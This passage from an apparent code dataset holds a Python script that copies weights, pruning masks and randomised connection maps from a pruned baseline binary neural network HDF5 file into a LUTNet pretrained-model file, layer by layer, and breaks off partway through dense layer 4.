ChildItem\\n')]"}}},{"rowIdx":739,"cells":{"code":{"kind":"string","value":"import h5py\nimport numpy as np\nnp.set_printoptions(threshold=np.nan)\n\nfrom shutil import copyfile\n\ncopyfile(\"dummy_lutnet.h5\", \"pretrained_bin.h5\") # create pretrained.h5 using datastructure from dummy.h5\n\nbl = h5py.File(\"baseline_pruned.h5\", 'r')\n#dummy = h5py.File(\"dummy.h5\", 'r')\npretrained = h5py.File(\"pretrained_bin.h5\", 'r+')\n\n# dense layer 1\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable_1:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable:0\"]\nzero_fill = np.zeros(np.shape(np.array(bl_w1)))\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable_1:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable:0\"]\n\npret_w1[...] = np.array(bl_w1)\np_gamma[...] = np.array(bl_gamma)\npret_pruning_mask[...] 
= np.array(bl_pruning_mask)\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 2\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_1\"][\"residual_sign_1\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_1\"][\"residual_sign_1\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_23:0\"]\npret_c24= 
pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = 
neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 3\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_2\"][\"residual_sign_2\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_2\"][\"residual_sign_2\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_8:0\"]\npret_c9 = 
pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_23:0\"]\npret_c24= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = 
np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] 
= rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 4\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_3\"][\"residual_sign_3\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_3\"][\"residual_sign_3\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_23:0\"]\npret_c24= 
pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = 
